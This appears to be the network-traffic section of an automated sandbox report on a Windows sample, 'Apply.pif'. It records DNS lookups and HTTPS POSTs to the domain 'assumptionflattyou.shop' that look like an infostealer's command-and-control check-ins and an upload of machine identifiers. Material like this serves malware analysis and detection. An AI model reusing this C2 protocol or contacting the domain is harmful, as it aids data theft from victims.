                                                  Jul 24, 2024 21:05:19.022813082 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.659312010 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.659543991 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.659573078 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:19.659641027 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.422009945 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.422060966 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:20.422123909 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.422489882 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.422506094 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:20.884295940 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:20.884371042 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.885687113 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.885695934 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:20.885932922 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:20.887182951 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.887300014 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:20.887306929 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:21.384886980 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:21.385128975 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:21.385152102 CEST44364747172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:21.385231972 CEST64747443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:21.842416048 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:21.842526913 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:21.842614889 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:21.842931032 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:21.842959881 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.368891954 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.368983984 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.370352030 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.370372057 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.370666981 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.371969938 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.372572899 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.372610092 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.372724056 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.372756004 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.372898102 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.372939110 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.373089075 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373120070 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.373276949 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373302937 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.373449087 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373469114 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.373476982 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373486996 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.373626947 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373644114 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.373668909 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373800993 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.373819113 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.384917021 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.385127068 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.385168076 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.385191917 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.385215044 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.385245085 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:22.385247946 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:22.385276079 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:23.908910036 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:23.909157038 CEST44364748172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:23.909246922 CEST64748443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:23.909856081 CEST64748443192.168.2.5172.67.163.54
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 24, 2024 21:04:49.332134962 CEST5663353192.168.2.51.1.1.1
                                                  Jul 24, 2024 21:04:49.343168974 CEST53566331.1.1.1192.168.2.5
                                                  Jul 24, 2024 21:05:12.626246929 CEST5619053192.168.2.51.1.1.1
                                                  Jul 24, 2024 21:05:12.642108917 CEST53561901.1.1.1192.168.2.5
                                                  Jul 24, 2024 21:05:18.154139996 CEST5361857162.159.36.2192.168.2.5
                                                  Jul 24, 2024 21:05:18.815685987 CEST6455853192.168.2.51.1.1.1
                                                  Jul 24, 2024 21:05:18.825056076 CEST53645581.1.1.1192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 24, 2024 21:04:49.332134962 CEST192.168.2.51.1.1.10x9431Standard query (0)qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGydA (IP address)IN (0x0001)false
                                                  Jul 24, 2024 21:05:12.626246929 CEST192.168.2.51.1.1.10xf07eStandard query (0)assumptionflattyou.shopA (IP address)IN (0x0001)false
                                                  Jul 24, 2024 21:05:18.815685987 CEST192.168.2.51.1.1.10x5c05Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 24, 2024 21:04:49.343168974 CEST1.1.1.1192.168.2.50x9431Name error (3)qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGydnonenoneA (IP address)IN (0x0001)false
                                                  Jul 24, 2024 21:05:12.642108917 CEST1.1.1.1192.168.2.50xf07eNo error (0)assumptionflattyou.shop172.67.163.54A (IP address)IN (0x0001)false
                                                  Jul 24, 2024 21:05:12.642108917 CEST1.1.1.1192.168.2.50xf07eNo error (0)assumptionflattyou.shop104.21.66.182A (IP address)IN (0x0001)false
                                                  Jul 24, 2024 21:05:18.825056076 CEST1.1.1.1192.168.2.50x5c05Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  • assumptionflattyou.shop
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549731172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:13 UTC270OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                  Data Ascii: act=life
                                                  2024-07-24 19:05:14 UTC818INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Jul 2024 19:05:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=2peq4pq5ti672bv6d5h9q7t05f; expires=Sun, 17-Nov-2024 12:51:52 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9aeu8MbG8ja1paFwL9z1Isu%2Bx7JBmFFFnXEh4c86cdJWRxR3nCZ2yC7MWjZvHpz%2FUXr8Z1zuuXGPbe68zytXx5uobWX%2Fe6y9MULeQH8o0%2FWe6RBpo%2BqFoJJ52XSUj1ZQ1h%2FICS8bwyn5RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e32ee8d727d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-24 19:05:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-07-24 19:05:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.549733172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:14 UTC271OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 57
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:14 UTC57OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 65 6c 6b 26 6a 3d 64 65 66 61 75 6c 74
                                                  Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@Zakielk&j=default
                                                  2024-07-24 19:05:15 UTC812INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Jul 2024 19:05:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=scdv27p22salv2uct5r30uakkj; expires=Sun, 17-Nov-2024 12:51:54 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgSTuZEPyiE48Uzwz7XFI0xyT07xcdDO2JgCoiH1luVzwKYjVHTNbj9iJq5%2FHWwqKiEn5fIjZsX91CBKWe1C7NCDSkBmTgkRYxHBeirKxFBqPddioIh5Xa58Qam7%2BPDDn7%2FsEMiTyXAVaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e3c9be443c8-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-24 19:05:15 UTC557INData Raw: 31 64 64 39 0d 0a 78 50 4e 4f 71 48 6f 6e 47 66 61 79 5a 62 74 73 39 53 39 39 50 2f 66 32 2b 32 35 65 57 45 4e 4f 46 32 46 6c 4c 79 30 55 49 44 43 2f 30 54 69 4b 51 42 4d 31 31 4d 45 41 6d 56 61 42 58 51 68 61 32 39 53 61 43 6e 78 69 4a 53 39 37 45 67 41 44 44 32 4a 4e 45 76 36 56 4c 38 51 4a 51 6a 58 55 31 78 32 5a 56 71 35 55 58 31 71 5a 31 4d 46 4d 4f 7a 49 68 4c 33 73 44 42 45 52 43 5a 45 78 54 72 4a 38 70 77 42 39 45 66 5a 66 65 43 4e 34 4a 6b 45 34 58 55 5a 36 62 6b 77 4e 38 64 47 45 72 62 55 4e 66 44 57 42 78 56 46 47 4a 6b 6a 33 44 57 46 6f 31 6a 5a 41 41 31 55 37 50 44 52 78 61 6c 5a 71 64 43 6a 55 77 4b 79 5a 7a 41 67 46 46 58 58 31 47 57 4b 79 52 4b 73 45 56 54 57 6d 61 31 41 2f 56 44 35 70 4f 58 78 50 56 6b 34 46 4d 5a 48 70 79 48 6e 59 53 46
                                                  Data Ascii: 1dd9xPNOqHonGfayZbts9S99P/f2+25eWENOF2FlLy0UIDC/0TiKQBM11MEAmVaBXQha29SaCnxiJS97EgADD2JNEv6VL8QJQjXU1x2ZVq5UX1qZ1MFMOzIhL3sDBERCZExTrJ8pwB9EfZfeCN4JkE4XUZ6bkwN8dGErbUNfDWBxVFGJkj3DWFo1jZAA1U7PDRxalZqdCjUwKyZzAgFFXX1GWKyRKsEVTWma1A/VD5pOXxPVk4FMZHpyHnYSF
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 59 52 56 47 30 30 78 6e 4a 46 6b 74 38 67 70 41 59 6c 78 66 58 53 68 4d 64 7a 64 53 58 43 54 4d 6f 49 44 35 77 44 52 56 42 53 6e 42 50 55 61 69 52 4b 63 30 56 53 33 32 54 30 77 2f 64 44 35 6c 42 46 56 36 52 6c 39 6c 43 66 44 30 35 62 43 31 44 4e 6b 35 4c 63 56 42 52 71 4e 45 7a 68 41 45 46 66 4a 69 51 58 35 6b 45 6b 55 41 57 56 70 4b 63 6c 52 34 33 4e 53 49 6c 63 67 55 4e 54 6b 64 38 52 46 79 6e 6c 69 6e 4e 43 6b 74 77 6d 64 4d 4e 33 30 37 5a 44 52 68 46 31 63 7a 5a 49 6a 38 72 4e 78 35 32 45 68 59 4e 55 44 68 62 45 71 47 64 62 4a 4a 59 54 48 4f 62 33 51 72 54 41 4a 4a 41 46 6c 79 55 6d 5a 38 48 50 54 49 70 4b 48 49 44 41 30 42 41 65 45 4a 63 72 70 51 6f 77 42 45 46 4e 64 54 58 48 35 6c 57 31 33 30 53 55 5a 36 59 32 7a 6b 2f 4e 43 38 72 59 30 4d 59 41 31
                                                  Data Ascii: YRVG00xnJFkt8gpAYlxfXShMdzdSXCTMoID5wDRVBSnBPUaiRKc0VS32T0w/dD5lBFV6Rl9lCfD05bC1DNk5LcVBRqNEzhAEFfJiQX5kEkUAWVpKclR43NSIlcgUNTkd8RFynlinNCktwmdMN307ZDRhF1czZIj8rNx52EhYNUDhbEqGdbJJYTHOb3QrTAJJAFlyUmZ8HPTIpKHIDA0BAeEJcrpQowBEFNdTXH5lW130SUZ6Y2zk/NC8rY0MYA1
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 72 35 77 72 78 78 4e 50 64 70 44 58 42 70 6c 41 31 30 6f 48 48 63 33 55 72 78 77 78 4e 67 38 6e 65 51 70 48 55 67 46 76 41 6c 57 71 30 58 53 4b 48 45 6c 7a 6e 74 38 4f 30 77 53 59 52 42 39 56 6e 4a 32 61 44 44 41 38 49 43 42 35 44 67 4a 4f 53 6e 74 48 55 71 71 57 4b 38 74 59 43 7a 75 54 79 45 65 42 54 71 64 41 45 31 61 5a 31 71 77 50 4d 6a 51 6d 4f 6a 55 63 53 56 51 50 63 55 34 53 2f 74 45 6a 79 78 56 50 63 4a 72 63 42 74 6b 4b 6c 45 63 66 55 70 43 53 6b 51 55 38 4b 43 59 6a 64 41 49 4d 52 6b 4a 34 52 31 4f 6a 6c 6d 79 45 57 45 4a 6a 31 49 68 48 39 43 65 74 44 51 41 54 6a 4e 53 65 41 48 78 69 59 53 68 2f 41 77 70 48 52 48 6c 42 56 61 69 52 49 63 41 4b 54 58 75 55 33 67 48 59 41 70 4a 4d 45 31 36 48 6d 4a 38 42 4f 6a 49 7a 62 44 74 44 41 46 55 50 4c 67 4a
                                                  Data Ascii: r5wrxxNPdpDXBplA10oHHc3UrxwxNg8neQpHUgFvAlWq0XSKHElznt8O0wSYRB9VnJ2aDDA8ICB5DgJOSntHUqqWK8tYCzuTyEeBTqdAE1aZ1qwPMjQmOjUcSVQPcU4S/tEjyxVPcJrcBtkKlEcfUpCSkQU8KCYjdAIMRkJ4R1OjlmyEWEJj1IhH9CetDQATjNSeAHxiYSh/AwpHRHlBVaiRIcAKTXuU3gHYApJME16HmJ8BOjIzbDtDAFUPLgJ
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 38 63 65 53 58 47 64 32 41 48 57 42 34 56 4f 45 31 4f 53 6d 70 55 43 4d 54 41 69 49 54 56 4e 52 30 70 58 4e 68 6f 53 69 70 59 68 35 42 4e 4a 66 4e 54 50 53 63 42 4f 6b 45 46 66 42 64 57 59 6b 77 41 31 4f 69 67 70 66 51 67 4f 53 45 35 39 52 31 47 67 6e 43 50 44 43 6b 39 34 6d 74 4d 4c 31 51 69 57 54 67 31 56 6e 4e 54 58 54 44 73 69 59 58 51 31 49 67 6c 41 57 33 46 53 45 72 6e 66 4e 59 6f 66 53 54 76 4d 6b 41 54 59 41 5a 52 4d 45 6c 75 63 6e 4a 6b 4b 4f 54 55 73 49 6e 49 45 42 30 42 42 65 55 52 61 71 35 30 6e 78 42 46 44 65 35 58 61 52 35 64 4f 6b 46 56 66 42 64 57 6b 6d 67 77 38 49 57 45 7a 4f 78 70 48 53 6b 4d 32 47 68 4b 30 6d 79 58 4b 47 30 70 38 6b 4e 73 4c 33 41 75 59 54 68 5a 59 6e 4a 71 4c 42 54 49 79 4b 53 4e 77 43 41 64 41 52 58 70 43 55 65 62 66
                                                  Data Ascii: 8ceSXGd2AHWB4VOE1OSmpUCMTAiITVNR0pXNhoSipYh5BNJfNTPScBOkEFfBdWYkwA1OigpfQgOSE59R1GgnCPDCk94mtML1QiWTg1VnNTXTDsiYXQ1IglAW3FSErnfNYofSTvMkATYAZRMElucnJkKOTUsInIEB0BBeURaq50nxBFDe5XaR5dOkFVfBdWkmgw8IWEzOxpHSkM2GhK0myXKG0p8kNsL3AuYThZYnJqLBTIyKSNwCAdARXpCUebf
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 78 7a 6b 64 77 4d 31 77 69 46 53 78 42 55 6c 70 65 51 43 7a 51 32 4b 79 39 79 51 30 6b 4e 53 47 34 43 43 75 61 79 4f 39 6f 56 42 57 54 61 79 55 66 65 41 74 63 56 58 31 57 59 6e 4a 4d 49 4f 7a 63 6d 4b 6e 77 52 44 6b 68 42 64 6b 5a 5a 71 5a 63 6f 79 52 68 58 66 5a 44 59 42 4e 51 44 6d 55 34 62 48 64 76 55 6e 68 52 38 59 6d 45 65 65 41 30 63 51 6b 68 6e 53 42 4b 35 33 7a 57 4b 48 30 6b 37 7a 4a 41 44 31 78 79 63 54 42 52 57 6d 35 4f 57 43 54 59 36 4c 69 68 32 44 51 78 4d 54 48 35 50 58 36 69 62 4a 63 4d 66 53 58 2b 54 6b 45 6d 5a 43 59 38 4e 52 78 32 2b 74 62 51 67 4f 79 42 68 4d 7a 73 61 52 30 70 44 4e 68 6f 53 71 70 67 67 77 42 4e 43 63 5a 72 5a 43 64 49 63 68 55 34 62 58 70 79 58 6e 67 55 79 4f 69 59 70 65 77 51 47 52 6b 74 38 51 56 54 6d 33 32 7a 4e 41
                                                  Data Ascii: xzkdwM1wiFSxBUlpeQCzQ2Ky9yQ0kNSG4CCuayO9oVBWTayUfeAtcVX1WYnJMIOzcmKnwRDkhBdkZZqZcoyRhXfZDYBNQDmU4bHdvUnhR8YmEeeA0cQkhnSBK53zWKH0k7zJAD1xycTBRWm5OWCTY6Lih2DQxMTH5PX6ibJcMfSX+TkEmZCY8NRx2+tbQgOyBhMzsaR0pDNhoSqpggwBNCcZrZCdIchU4bXpyXngUyOiYpewQGRkt8QVTm32zNA
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 66 43 74 6f 49 6c 45 59 61 56 35 53 54 6b 51 45 75 4f 53 34 6a 63 51 4d 49 53 30 6c 33 54 56 53 68 6d 43 33 43 48 77 55 31 31 4e 63 66 6d 56 62 58 59 78 68 65 6b 64 53 47 51 69 56 36 4a 69 41 31 57 30 64 4e 52 58 78 49 58 4b 61 57 50 73 77 52 52 58 69 47 30 77 48 52 43 4a 74 42 45 6c 57 63 6c 4a 77 48 4d 54 45 73 4b 6e 55 49 42 67 30 42 4e 6b 56 4b 35 73 6c 73 2b 78 56 4c 66 35 72 54 46 39 35 4f 69 41 4d 47 48 5a 4b 59 32 56 52 38 4e 53 67 2b 63 67 59 50 52 45 39 34 53 31 75 68 6c 53 2f 4c 48 45 6c 30 6e 64 4d 50 32 41 61 59 54 68 39 57 6e 5a 36 59 41 6a 6c 36 62 32 78 79 47 30 63 56 44 31 6c 42 56 36 32 51 62 75 30 65 51 6e 66 55 7a 30 6e 41 54 70 42 42 58 77 58 56 6c 35 30 43 4e 54 55 6c 4a 6e 49 44 41 45 74 50 66 6b 6c 66 72 59 4d 70 78 42 31 45 65 35
                                                  Data Ascii: fCtoIlEYaV5STkQEuOS4jcQMIS0l3TVShmC3CHwU11NcfmVbXYxhekdSGQiV6JiA1W0dNRXxIXKaWPswRRXiG0wHRCJtBElWclJwHMTEsKnUIBg0BNkVK5sls+xVLf5rTF95OiAMGHZKY2VR8NSg+cgYPRE94S1uhlS/LHEl0ndMP2AaYTh9WnZ6YAjl6b2xyG0cVD1lBV62Qbu0eQnfUz0nATpBBXwXVl50CNTUlJnIDAEtPfklfrYMpxB1Ee5
                                                  2024-07-24 19:05:15 UTC247INData Raw: 48 4a 46 4f 43 56 37 53 71 71 63 69 4f 7a 77 6b 4b 32 56 42 4b 55 5a 62 63 51 49 63 35 70 35 73 6b 69 45 46 4d 39 54 76 53 5a 6b 57 31 78 56 66 61 4a 61 61 6c 77 73 71 4b 32 77 43 63 67 55 43 53 6c 38 30 62 46 6d 79 6c 6d 79 45 57 45 4d 37 7a 49 42 4a 6d 51 71 47 44 55 63 4e 78 38 2f 4d 58 32 74 71 63 7a 4d 37 47 6b 64 62 44 79 34 51 48 4f 61 44 62 4a 4a 59 41 6e 69 47 77 67 48 61 47 4a 51 4b 49 57 4f 57 67 70 51 44 4e 7a 73 66 45 6c 73 4f 42 6b 35 42 4e 48 4e 45 71 34 45 76 7a 78 39 37 52 5a 72 58 45 39 34 41 6b 55 31 66 45 39 57 62 32 56 51 46 65 6d 6c 73 53 6b 31 48 56 51 38 75 41 6d 65 6c 6e 79 4c 4e 44 6c 51 32 74 38 59 4b 31 67 57 57 44 56 45 64 6b 39 54 42 58 48 4a 36 4a 54 30 31 57 31 63 66 46 43 4d 52 42 66 62 44 4d 0d 0a
                                                  Data Ascii: HJFOCV7SqqciOzwkK2VBKUZbcQIc5p5skiEFM9TvSZkW1xVfaJaalwsqK2wCcgUCSl80bFmylmyEWEM7zIBJmQqGDUcNx8/MX2tqczM7GkdbDy4QHOaDbJJYAniGwgHaGJQKIWOWgpQDNzsfElsOBk5BNHNEq4Evzx97RZrXE94AkU1fE9Wb2VQFemlsSk1HVQ8uAmelnyLNDlQ2t8YK1gWWDVEdk9TBXHJ6JT01W1cfFCMRBfbDM
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 32 34 34 37 0d 0a 34 51 42 42 57 33 55 69 46 57 58 54 6f 55 4e 52 78 33 53 6d 70 51 4e 50 7a 51 69 50 6d 63 46 42 46 74 4d 4d 58 78 73 68 35 77 6e 78 68 56 4b 63 4b 72 75 4a 74 51 46 6d 30 41 51 56 71 75 71 6a 41 38 79 4e 43 59 36 5a 45 4e 4a 44 55 41 32 47 6d 76 6d 32 57 7a 31 56 67 56 6a 31 49 68 48 37 41 32 5a 51 78 68 4c 68 4e 6d 34 41 54 63 32 4c 43 4e 2b 51 30 6b 4e 53 54 59 61 41 75 6a 52 4b 4e 74 59 48 53 76 47 69 31 4b 4b 57 63 63 66 41 42 4f 4d 31 49 39 4d 5a 47 68 76 62 47 64 44 58 77 30 49 64 56 42 41 6f 4a 49 36 79 56 39 37 52 62 66 48 45 64 4d 56 31 57 73 59 54 4a 79 43 6c 42 34 43 42 41 38 68 64 41 41 4a 44 33 35 67 54 30 4b 6c 6c 43 76 30 4a 6b 74 38 67 4e 63 4a 33 77 37 58 41 31 39 53 31 63 79 67 54 48 52 36 48 6d 49 31 47 30 63 56 44 30
                                                  Data Ascii: 24474QBBW3UiFWXToUNRx3SmpQNPzQiPmcFBFtMMXxsh5wnxhVKcKruJtQFm0AQVquqjA8yNCY6ZENJDUA2Gmvm2Wz1VgVj1IhH7A2ZQxhLhNm4ATc2LCN+Q0kNSTYaAujRKNtYHSvGi1KKWccfABOM1I9MZGhvbGdDXw0IdVBAoJI6yV97RbfHEdMV1WsYTJyClB4CBA8hdAAJD35gT0KllCv0Jkt8gNcJ3w7XA19S1cygTHR6HmI1G0cVD0
                                                  2024-07-24 19:05:15 UTC1369INData Raw: 72 77 72 4a 43 55 39 61 6d 63 41 41 35 7a 43 43 54 68 46 54 6b 6f 4b 49 54 48 4a 36 4c 6d 77 74 4f 6b 63 46 41 33 42 42 52 4f 61 75 59 6f 6f 41 42 53 50 55 35 51 54 58 41 4a 42 62 44 68 43 7a 6c 34 67 47 48 54 63 78 4b 7a 56 4e 52 30 73 50 4c 68 45 63 35 70 55 39 69 6b 41 56 4b 63 2b 46 56 49 35 65 78 56 4a 52 52 4e 57 43 32 56 52 75 64 47 45 2b 4e 56 74 48 43 6b 78 6b 55 46 53 6c 68 79 2b 4e 4a 6e 74 4f 6c 39 34 4a 33 68 69 69 54 67 35 65 6c 5a 2b 6e 4d 68 30 30 4b 69 74 35 46 54 6c 7a 65 6e 56 4d 58 4b 47 48 50 59 70 57 42 58 54 55 69 44 36 5a 52 74 64 79 55 52 32 4e 31 4d 46 4d 43 54 6b 76 49 6e 49 56 46 67 42 36 64 56 4e 52 70 70 70 73 68 46 68 44 4f 38 79 43 53 5a 6b 4b 68 67 31 48 44 63 66 50 7a 46 39 72 61 6e 4d 7a 4f 78 70 48 57 77 38 75 45 42 7a
                                                  Data Ascii: rwrJCU9amcAA5zCCThFTkoKITHJ6LmwtOkcFA3BBROauYooABSPU5QTXAJBbDhCzl4gGHTcxKzVNR0sPLhEc5pU9ikAVKc+FVI5exVJRRNWC2VRudGE+NVtHCkxkUFSlhy+NJntOl94J3hiiTg5elZ+nMh00Kit5FTlzenVMXKGHPYpWBXTUiD6ZRtdyUR2N1MFMCTkvInIVFgB6dVNRpppshFhDO8yCSZkKhg1HDcfPzF9ranMzOxpHWw8uEBz


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.549735172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:16 UTC289OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 13683
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:16 UTC13683OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
                                                  2024-07-24 19:05:16 UTC812INHTTP/1.1 200 OK
